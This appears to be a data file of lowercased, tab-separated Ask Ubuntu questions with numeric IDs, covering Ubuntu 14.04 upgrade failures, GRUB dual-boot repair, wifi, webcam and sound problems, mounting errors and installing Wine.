459141	how do i update from 13.10 to 14.04 ?	i have problems with upgrading ubuntu.the terminal says this . checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done calculating the changes calculating the changes could not determine the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done
459142	grub not giving any options on partition laptop	i installed ubuntu 14.04 this morning some free space i had partitioned on my win7 laptop . since then it will only boot into ubuntu . from all the other posts i 've seen it appears to usually be the other way around . i would be far more comfortable keeping and using linux if i knew that i could get back to windows should i need to . grub does not present me with any options . the bootinfoscript now returns the following , as i have spent some time trying to make sure i have a menu.lst file and the boot disk ) sda1 ) ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 112 for . = > no boot loader is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sda3 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 2048 . operating system : boot files : sda6 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 14.04 lts boot files : /boot/grub/menu.lst /boot/grub/grub.cfg /etc/fstab sda7 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sdb1 : __________________________________________________________________________ file system : vfat boot sector type : - boot sector info : no errors found in the boot parameter block . operating system : boot files : edit - ran os-prober and came back with the following results /dev/sda2 : windows recovery environment ( loader ) : windows : chain /dev/sda4 : windows recovery environment ( loader ) : windows1 : chain i 've run the boot-repair and i now have grub giving me the options for ubuntu or windows recovery environment . i have a partition for boot , 1 for windows , 1 which was used for storage and then 1 for a virtual machine . running both os-prober and then sudo grub-mkconfig comes back with the below . i 've managed to get the window repair environment onto the grub loader , but it still wont let me boot into windows . even the windows recovery disk is n't letting me in . phil @ wrencrescent : ~ $ sudo os-prober /dev/sda2 : windows recovery environment ( loader ) : windows : chain /dev/sda4 : windows recovery environment ( loader ) : windows1 : chain phil @ wrencrescent : ~ $ sudo grub-mkconfig generating grub configuration file ... # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 7d8f76ab-c8ce-4f92-9714-38e283ea84c6 else search -- no-floppy -- fs-uuid -- set=root 7d8f76ab-c8ce-4f92-9714-38e283ea84c6 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_gb insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=menu set timeout=10 # fallback normal timeout code in case the timeout_style feature is # unavailable . else set timeout=10 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-7d8f76ab-c8ce-4f92-9714-38e283ea84c6 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 7d8f76ab-c8ce-4f92-9714-38e283ea84c6 else search -- no-floppy -- fs-uuid -- set=root 7d8f76ab-c8ce-4f92-9714-38e283ea84c6 fi linux /boot/vmlinuz-3.13.0-24-generic root=uuid=7d8f76ab-c8ce-4f92-9714-38e283ea84c6 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-7d8f76ab-c8ce-4f92-9714-38e283ea84c6 ' { menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-7d8f76ab-c8ce-4f92-9714-38e283ea84c6 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 7d8f76ab-c8ce-4f92-9714-38e283ea84c6 else search -- no-floppy -- fs-uuid -- set=root 7d8f76ab-c8ce-4f92-9714-38e283ea84c6 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=7d8f76ab-c8ce-4f92-9714-38e283ea84c6 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-7d8f76ab-c8ce-4f92-9714-38e283ea84c6 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos6 -- hint-efi=hd0 , msdos6 -- hint-baremetal=ahci0 , msdos6 7d8f76ab-c8ce-4f92-9714-38e283ea84c6 else search -- no-floppy -- fs-uuid -- set=root 7d8f76ab-c8ce-4f92-9714-38e283ea84c6 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=7d8f76ab-c8ce-4f92-9714-38e283ea84c6 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/30_os-prober # # # found windows recovery environment ( loader ) on /dev/sda2 menuentry 'windows recovery environment ( loader ) ( on /dev/sda2 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-1670675a7067401b ' { insmod part_msdos insmod ntfs set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 1670675a7067401b else search -- no-floppy -- fs-uuid -- set=root 1670675a7067401b fi parttool $ { root } hidden- drivemap -s ( hd0 ) $ { root } chainloader +1 } found windows recovery environment ( loader ) on /dev/sda4 menuentry 'windows recovery environment ( loader ) ( on /dev/sda4 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-58deb964deb93b58 ' { insmod part_msdos insmod ntfs set root='hd0 , msdos4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos4 -- hint-efi=hd0 , msdos4 -- hint-baremetal=ahci0 , msdos4 58deb964deb93b58 else search -- no-floppy -- fs-uuid -- set=root 58deb964deb93b58 fi parttool $ { root } hidden- drivemap -s ( hd0 ) $ { root } chainloader +1 } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # done
459143	how to map volume buttons on apple earpods	i can not control volume using apple earpods 's buttons . is there any way to do so ? my system : ubuntu 14.04 64bit .
459145	mounting via cifs or sshfs at boot depending on wifi ssid	i have a ubuntu home server 12.10 that is available over the internet for ssh connections . i also have my ubuntu laptop that i use at home and when on the road . what i would like is that during the boot , depending on the available wifi connection , it either chooses cifs when on my home network , or sshfs otherwise . i do n't want to use sshfs by default on my home network as by going via dyndns and my limited home internet connection upload speed , i think it will be significantly slower for day to day tasks at home . i do n't think fstab has some sort of heirarchical mount tree that would allow me to do this ( from what i have read in the man pages anyway ) . does this seem logical/reasonable , or am i going about it the wrong way ? and if it is valid , how would i go about doing it ? thanks in advance , regards , david
459146	xubuntu 14.04 wo n't connect to wifi unless i press wifi button twice	this is a clean install of xubuntu 14.04 64bit on a compaq presario cq60-215dx laptop , circa 2009 . previously , i had xubuntu 12.04 installed on this laptop and this issue did not occur in 12.04 . after imaging my 12.04 install , i wiped the drive and did a fresh install of 14.04 . here 's what happens : i turn the laptop on , i see the wifi button turn from orange to blue during bootup , indicating wifi has been enabled . i get to the desktop and in network manager , wifi is checked on , but shows `` disconnected ' and does not list any ssids to connect to . the button is still lit blue , indicating the wifi radio on . an 'rfkill list ' command shows no hard or soft blocks . if i manually press the wifi button twice and wait about 30 seconds , then wifi starts to show ssids and i can connect to mine . upon reboot , the same thing occurs again -- wifi light is blue , but not picking up any ssids . i press the wifi button twice , and after about 30 seconds it connects to my ssid and starts showing other surrounding ssids . any ideas on how to get it to automatically connect to my wifi without having to manually press the wifi button twice ? thank you .
459148	laptop in-built web cam stopped working hp probook	my laptop ( hp probook ) webcam has always worked . when i upgraded to 13.10 it stopped working . no solution found then so gave up . recently upgraded to 14.04 still not working so thought i would ask anyone again if a solution had been found . lsusb bus 001 device 004 : id 0c45:62c0 microdia sonix usb 2.0 camera dmesg | grep uvcvideo` [ 765.466575 ] uvcvideo : found uvc 1.00 device usb 2.0 camera ( 0c45:62c0 ) [ 765.467305 ] uvcvideo : uvc non compliance - get_def ( probe ) not supported . enabling workaround . [ 765.467954 ] uvcvideo : failed to query ( 129 ) uvc probe control : -32 ( exp . 26 ) . [ 765.467960 ] uvcvideo : failed to initialize the device ( -5 ) . [ 765.468022 ] usbcore : registered new interface driver uvcvideo tried searching everywhere but there does not appear to be any clear solution to the driver issue - very weird as my camera is listed as supported by uvcvideo and it has always worked .
459153	font issue with google chrome	i just updated google chrome to version 34 and got this : as you can see , the tab title font uses these narrow letters , whereas other texts are as they were before the update . does any one of you know where this comes from and how to fix it ? i 'm using kubuntu raring x64 ( yes , i know its eol , but i damaged the system so much a release upgrade would totally break it . i 'm soon getting a new device and i want to keep a running system until then ... )
459154	remove all development libraries	i 've built a few apps from source which required development libraries . and when i installed them , they installed more -dev dependencies . now i want to remove those libraries . the command sudo apt-get purge lib*-dev can do any harm to my ubuntu 14.04 installation ? are there any development libraries included in a fresh install of ubuntu ? if there are , should i keep them ?
459155	how to write a shell script using command line argument to convert hours to seconds	okay everyone . i am working on a shell script but i want to use command line arguments instead . for instance if i enter time 2 hours , the output should be 7200 seconds . this is what i have so far but it is using the read instead of argument . how can i rewrite this as command line argument ? seconds=0 echo -n `` enter number of seconds : `` read seconds hours= $ ( ( seconds / 3600 ) ) seconds= $ ( ( seconds % 3600 ) ) minutes= $ ( ( seconds / 60 ) ) seconds= $ ( ( seconds % 60 ) ) echo `` $ hours hour ( s ) $ minutes minute ( s ) $ seconds second ( s ) ''
459157	ca n't take screenshot with 14.04	i just made a fresh install of ubuntu 14.04 . all goes well but i ca n't take screen-shot with the shortcut print key . in the shortcuts settings the key is recognized . previously installed ubuntu 13.04 and the shortcut worked .
459165	pulseaudio cpu load after skype starts during session restoring	i have kubuntu 14.04 upgraded from 12.04 . if skype starts up with system automaticly , by previous session restoring , the pulseaudio loads one core of cpu . but when i restart the skype , everything is ok . i face this problem only when skype starts up with system load . can anyone suggest me the solution ? thank you !
459168	i 've trouble removing/upgrading tuxcut , can anybody help me here please ?	when i try to remove or upgrade , it shows this error : ( reading database ... ( reading database ... 100 % ( reading database ... 166948 files and directories currently installed . ) preparing to unpack ... /tuxcut_5.1_all.deb ... rm : can not remove /usr/bin/run-tuxcut : no such file or directory dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg : trying script from the new package instead ... dpkg : error processing archive /mnt/080e0b150e0afb86/programs/linux/linux programs/tuxcut_5.1_all.deb ( -- install ) : there is no script in the new version of the package - giving up
459169	wine : how can i make wine applications look like windows 8 ?	i just installed wine and i realized the applications look terrible . i wanted the look and feel of windows 8 on my wine applications , how can i go about doing this ? thanks !
459172	getting launcher on dual monitors	i recently bought a second monitor for my computer . setting it up was fairly easy , but when i turned the monitor i found that the unity launcher bar that is on the right monitor did not transfer over to my newly bought left monitor . i would like to have a launcher on each monitor . i saw some places where people went to `` display ' in settings and could get it from there but when i went into display the only things i could change were the resolution of my screens and if i wanted to mirror them . help is much appreciated . thanks .
459182	usb ports not working after software updates	i have ubuntu 14.04 lts installed on a laptop . everything was running great until a software update today ( may 1 , 2014 ) . the mice ( ms trackball , belkin mini retractable ) work on my win7 laptop . the ubuntu laptop has usb 2.0 ports and the mice are not recognized at all . something in the updates broke usb . any ideas ?
459183	can i use same external drive to backup and install new version ?	i have an old laptop with sadly out of date 10.04 lucid on it . the internal drive is partitioned and contains windows 7 , which i never use . gradually , it 's losing functionality , as more software becomes incompatible with it . i recently bought an external drive to backup all my data on . my plan is to reformat the internal drive on the laptop and start over with the current lts version ( 14.04 trusty ) , simplifying the partition tree in the process by wiping away windows , etc . question : can i also use the external drive to boot from and to reinstall the ubuntu ? perhaps on a separate partition ?
459186	sound problem in pulse audio	when i closed my samsung laptop with the audio jacked in my pulseaudio stoped working , in login screen i can see the sound icon , but when i log in to my account i ca n't see my indicator and ca n't control the volume . if i try to change sound device i ca n't see any device in settings but my sound works . any ideas how to make things normal back again , i ca n't use my fn button to control my sound and ca n't switch between devices . i have tried pulseaudio -k and pulseaudio -d k says `` no such process '' and d says failed . need help
459190	ubuntu on chromebook c710 error	i have an acer chromebook c710-2847 . i am trying to install chrubuntu . the main issue that shows up is that while the install runs to an apparent completion , i am never able to actually get to ubuntu . my basic appoach is that which seems to be well accepted , http : //www.youtube.com/watch ? v=4qpjtzav3kw but after the install , it does not boot into ubuntu and forcing priority of the kernel does not seem to work either . i do notice that at the very end of the install , i do get some sort of error which i paraphrase here : ( note i was not able to capture all details ) error kernel file 2fsck 1.42 ( 29-nov-2011 ) pass 1 ... some text here pass 2 through 5 ... some text here resizing file system to 54428800 begin pass 1 ( max =1560 ) extending inode table file system on /dev/sda7 is now 52428800 long chronos @ localhost ~ $ ( i think ) at which point the system then reboots ... and launches chrome , not ubuntu . i went back in and tried to force the os kernel hierarchy as well , to no avail , chrome keeps launching . note that i am suspecting this is a related post to the follow existing posts : how do i access ubuntu on acer chromebook after installation ? chromebook install ubuntu but i can not to start ubuntu . acer c7 ubuntu 12.04 boot issue please help .
459192	installation of .c files in phylip	i am trying to install .c functions of phylip in linux/ubuntu . i read documentation and it mentioned it is very easy compilation and of .c functions : to make executables , use your c compiler . it is probably as simple as going into the src directory , copying makefile.unix and calling the copy makefile , and then typing the command make install i just have makefile.unx in the folder . not any configure . * files . what exactly means this phrase ? copying makefile.unix and calling the copy makefile maybe it is very clear but i am new in linux , sorry . thanks
459194	uncomplicated firewall blocks playing streames in vlc	can anybody help me please how to allow igmp protocol in ufw ? my provider streams tv signal . i have .m3u8 file as channel list . it contains items as udp : // @ 239.1.1.42:11111 . vlc does not open the stream . when i disable the firewall , it does . thanks .
459197	installing desktop environment changed bg in grub2	as a ubuntu 12.04.4 lts 32-bit user i have installed various desktop environments and found out that the loading screen and the background of grub2 changed from pink to gray together with a change in the icon displaying during the initial loading before user login . to revert the change i removed the installed packages with the purge option but the neither grub or the loading screen returned to their original state . is it possible to restore the default behavior of these components ? thanks
459199	how can i save images on the web with drag and drop ?	in firefox on mac osx i usually save images by dragging them from the browser to the folder i want to save them to . i prefer this method compared to navigating through the file browser as it is much faster . when i do the same in ubuntu trusty 14.04 it saves a link to the image instead of the actual image . is there any way to change this behavior ?
459207	hard drive error rate	i recently installed ubuntu and am loving it . the only issue that seems to persist is a bit of a ( very soft ) scratching sound coming from my hdd . i checked my drive manager and it appears to have a high read error rate . is this a major issue ? the software said any value other than 0 `` indicates a problem with the disk or the read/write heads . '' here 's a quick screenie for reference : thanks for any help !
459217	could not find a kernel image on livecd 14.04 lts	i downloaded the iso of ubuntu 14.04 lts 4 times from 4 different official mirrors and when i use them they all gave me this message , i can not even get to the menu to check the disk . could not find kernel image : /casper/vmlinuz message : mirrors : burned dvd : sorry but i ca n't post images and more than two links because i 'm newbie in askubuntu . : (
459218	boot back to windows ?	i 'm sure this question has been asked thousands of times but here i go : so i installed the latest ubuntu ( dual booting with my windows 8 ) and it keeps booting to the usb i used . if i take it out it try 's to search for it and fails obviously so it says it ca n't find a boot disk . i need to get back to my windows how do i do this ? !
459219	how do i test wine ?	i found an instructible for using sketchup in ubuntu that requires using wine . i supposedly loaded the wine program , but i ca n't find it . if i do find it , i still would like to test to see if it is installed correctly . anybody have any ideas ? first : where do i look to see if it was downloaded ? second : how do i test it ? thanks
459222	wireless switched off and led indicator does n't go out	when i switch off wireless the led indicator in my laptop does n't go out . i did n't find a solution in forums and search engines so i hope folks here can help me . thanks in advance .
459225	downloading ubuntu onto a dvd-r	i was wondering if i will be able to download ubuntu onto a dvd . if so , will doing so automatically replace windows as my os ? i 'm downloading it using someone else 's computer and i do n't want to accidentally download ubuntu onto their computer . basically what i 'm asking is will downloading ubuntu on a dvd only burn it onto the disc or will it replace windows as the computer 's operating system ? another question ; is a 4.7gb disc going to be enough space for the operating system ?
459228	wireless not recognized	i am a first time user of linux -- just installed it a week ago . i have a dell latitude d500 laptop that i am trying to breathe new life into . i installed ubuntu 12.04 lts non-pae ( whatever that is ) and now there is no wireless available . i have looked around the web and tried some fixes but none have worked but then again i did n't fully understand what they were talking about .
459229	problem with plate intel integrated video and html5 , the videos look with yellow dots rain	i tell them that i have a laptop hp 550 with ubuntu 12.04 i have the following problem . i see youtube videos of popcorn and a shower of yellow dots . i guess the problem must be between my motherboard intel integrated video ( intel corporation mobile gme965/gle960 ) and html5 format . i say this because i 've been looking for quite some time in various forums , and many raise the issue that may be the flash . in my case it is not because probe all possible solutions and none turned out , but i have also this problem in both chrome and chromium using html5 and not flash using firefox . in the system of popcorn torrent video for me happens the same , i guess i will use html5 . on the other hand i 'm pretty sure it 's incompatible my video card because i have another machine ( desktop ) with the same os and nvidia board , and i walk all perfect . screenshot . http : //www.subirimagenes.net/i/140501060650687879.png this happens to me in both small screen and full any suggestions to solve this ? from already thank you very much pd : sorry but is well understood , i 'm using the google translator
459230	administrator password	i have recently installed ubuntu 14.04 on my laptop and when i enter the admin password ( it is only me using the system ) i get the message that the password is wrong ... .i know that this is not the case . however if i boot up the laptop from power up i can get into the system and use what is currently installed , however when i want to install any additional programs / add ins i get asked to authenticate . i enter my password , press enter and get the following message . `` your authentication attempt was unsuccessful . please try again '' followed by `` you do not have required privileges to perform this action '' i do not remember setting this up when i installed over xp please help . thanks
459232	ca n't mount cd-rw after erasing it with cdrecord / wodim	if i try to mount ( click at disk in thunar file manger ) a cd-rw after erasing it , i will get this error : error mounting /dev/sr0 at /media/username/cdrom : command-line `mount -t `` iso9660 '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 '' `` /dev/sr0 '' `` /media/username/cdrom '' ' exited with non-zero exit status 32 : mount : block device /dev/sr0 is write-protected , mounting read-only mount : wrong fs type , bad option , bad superblock on /dev/sr0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so the command that i use to erease the disc is : cdrecord -v blank=fast dev=/dev/cdrom i try `` cdrecord -reset '' after the error , this does n't help . but if i reject the disc and close again , there are no problems to mount the disk . is there a way to get the disk accessible without reject them ? system - > xubuntu 14.04 edit : workaround : cdrecord blank=fast dev=/dev/cdrom -eject & & eject -t
459235	can not access usb drive - non-zero exit status 32 : mount : unknown	i am trying to access my fat32 usb drive . there is an error when i try accessing it . i just want to access it read-only . the error i get is : error mounting /dev/sde at /media/mink/34d2-84fb : command-line `mount -t `` exfat '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sde '' `` /media/mink/34d2-84fb '' ' exited with non-zero exit status 32 : mount : unknown filesystem type 'exfat' what commands should i use to access this drive ?
459237	when i try to install my kernel headers i get `` please insert the disc labeled 'ubuntu ' ''	i just installed ubuntu 14.04 and i am trying to install vmware workstation 10.0.2.bundle . i followed the description on ( https : //help.ubuntu.com/community/vmware/player ) . while trying to install the linux headers , i got this error message : media change : please insert the disc labeled 'ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) ' in the drive '/media/cdrom/ ' and press enter i inserted the usb stick which i installed my ubuntu from and i am still getting the error message . i really need to install vmware workstation .
459240	how do i install video drivers for my radeon hd 6450 ?	just switched my emachines pc over to ubuntu studio 12.04 in hopes of getting a little bit more out of the dated hardware . i have a his radeon hd 6450 that worked great when the machine was running windows 7 . with ubuntu i ca n't get anything but colored static on the screens . the on-board vga port works fine for ubuntu , unless i have the radeon put in . is this even compatible ? is there some way to install what i need to make this work ? i 'm new to ubuntu , so any help would be greatly appreciated .
459243	arrow keys not working in grub	i have ubuntu 14.04 and windows 7 installed in my computer , but since i update to ubuntu 14.04 the arrow keys does not work in grub , so i can not boot windows 7 . however it is very weird that after it boots ubuntu the arrows keys work perfectly . help ! ! !
459246	what is the short cut key for command line auto complete ?	i am running ubuntu 13.10 . when i log in through remote desktop and use the terminal , i can not use the tab key to auto complete the command for items such as files/directories . the remote window manager is xfce , and the terminal shell is bash . if i access the same box using ssh , i can use tab key to auto complete . what is the key for auto complete command for the terminal emulator in xfce window ? the regular tab key does not work .
459247	how to remove build-essential manually when it is part of another package ?	we installed a nagios plugin that brought along build-essential , and i 'd like to remove it because i do n't want build tools on a production server . when i simulate the apt-get remove command : apt-get remove build-essential -- simulate it says it will also remove the nagios plugin . how can i remove build-essential while keeping the plugin ?
459257	ca n't restore grub after upgrade to 14.04 ( `` grub_term_highlight_color '' bug )	i recently upgraded from 13.10 to 14.04 and , as dozens of other people , i was gifted with the grub_term_highlight_color bug . i then tried to restore grub by booting from a live cd and using boot-repair , but the process fails and generates log files , the last of which can be found here : http : //paste.ubuntu.com/7375835/ the machine is a dual boot desktop ( windows 8 with uefi ) . all /dev/sda partitions are listed in that log file , but the repair tool insists in saying that an error occurred with the boot loader ( it says it could n't be found ) . maybe this is about uefi or something else related to the windows partitions . the fact is i ca n't use that computer any more , because neither ubuntu nor windows will load ( and i 'm clueless ) . i 'm aware of all other related questions on askubuntu - none of them worked for me . any help is much appreciated .
459259	trouble with ubuntu 14.04 usb installation ; coming from windows 8.1 pro	when i get to the `` installation type '' page where i should be able to choose to either install ubuntu alongside windows or erase windows and install ubuntu , i have no options . if i click install it gives me an error . i have an hp envy .
459260	uninstalled tlp , or thought so , but still running and akward on 13.10	newbie question , i searched but could n't find how to uninstall tlp , i installed it but păšrformance is weird on 13.10 and i 'm on a desktop so do n't really need it , so i uninstalled it through synaptic but i still have the icon of it running . thnx .
459267	time keeps shifting back at startup	i am running lubuntu 14.04 lts , dual booting with windows , i have utc set to no . i tried using sync time , but it 's 3 hours back . when i set it manually its ok until i restart , and then it shifts 3 hours back on every restart for some reason . this is very annoying and i have no idea how to keep the time locked ; / [ pressing lock doesnt work ]
459269	how to install canon lbp3300 printer in 14.04 lts ?	i have been using ubuntu 12.04 and canon lbp 3300 was working fine . when i recently upgraded to 14.04 , it stopped working . sudo service ccpd status gives me one number only .
459271	mozilla firefox terribly slow on ubuntu 14.04	it is being observed since my upgradation to ubuntu 14.04 , that the firefox browser is terribly slow . can anything be done about it ?
459277	how do i make a program auto-start everytime i log in in ubuntu 14.04 ?	i read the previous answers to this question , and tried to follow , but it does not work . i wanted to add chromium and skype to the startup applications , but i ca n't find out what command i should write in there . i tried the other suggested method : right-clicked on the icon in the launcher , but there is no item called `` add to the startup '' in the pop-up menu . i am new to linux and ubuntu , sorry if there is an obvious answer , please help . thanks peter
459279	desktop icons label too dark in nemo file manager	i have installed nemo in ubuntu 14.04 from www.webupd8.org/2013/10/install-nemo-with-unity-patches-and.html , and it worked fine . today i rebooted my computer and i found my desktop icons with dark labels , like this : desktop nemo instead of light labels like the ones drawed by nautilus : desktop nautilus i do n't know what messed nemo 's label , but i think it may be related to gtk : i messed a little with gtk libraries ( in particular python-gtk2-dev and pygtk ) before rebooting , to solve some problems with matplotlib in pylab . i also updated my packages and edited the grub option : grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=legacy '' to solve some luminosity issues , but then i changed back to `` quiet splash '' ( it did not solved anything ) . i may also tweaked something in ccsm , but i do n't recall what . in short , i messed around , and i do n't know what caused this problem . how can i change back the colour of the labels ?
459280	ca n't install wine on ubuntu 14.04	i can not install wine on ubuntu 14.04 . when i try to install it on the ubuntu software center i always get a message that says i have unmet dependencies . i tried installing wine through the terminal and i get this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed e : unable to correct problems , you have held broken packages .
459283	how to disable ( not remove completely ) global menu bar ?	while using the text-editors i like to work on text editors with completely full-screen mode . but in almost all editors the global-menu-bar of ubuntu desktop remains on the screen . i just want to disable it while using the text-editor ( emacs ) and once i am done i would like to get it back . i do n't want to remove it completely . i want it to look like this how can i do this ? thanks a lot ! i am using ubuntu 14.04 !
459284	how to use different workspaces on ubuntu 14.04 ?	i heard something about having multiple work spaces on ubuntu 14.04 and was curious about it .
459287	all motherboard ports non-functional after upgrade from 13.10 to 14.04	i 'm using ubuntu server - i 've been running 13.04 for about a year . since it 's no longer supported , i did a release upgrade to 13.10 . that went smoothly . i then did another upgrade from 13.10 to 14.04 . immediately after doing so , the network does n't come up during boot , and not a single usb port works . without a keyboard , i 'm powerless . and without network , i ca n't ssh in . thankfully , if i revert to an older kernel in grub , it boots fine and all of my services load without a problem . the offending kernel is 3.13.0-24 , and the previous kernel that does work is 3.8.0-35 . it seems as if the motherboard drivers are broken . my motherboard is a dfi infinity p965 . is there anything i can do to better diagnose or remedy this problem , or is this an issue that only an update can fix ? thanks .
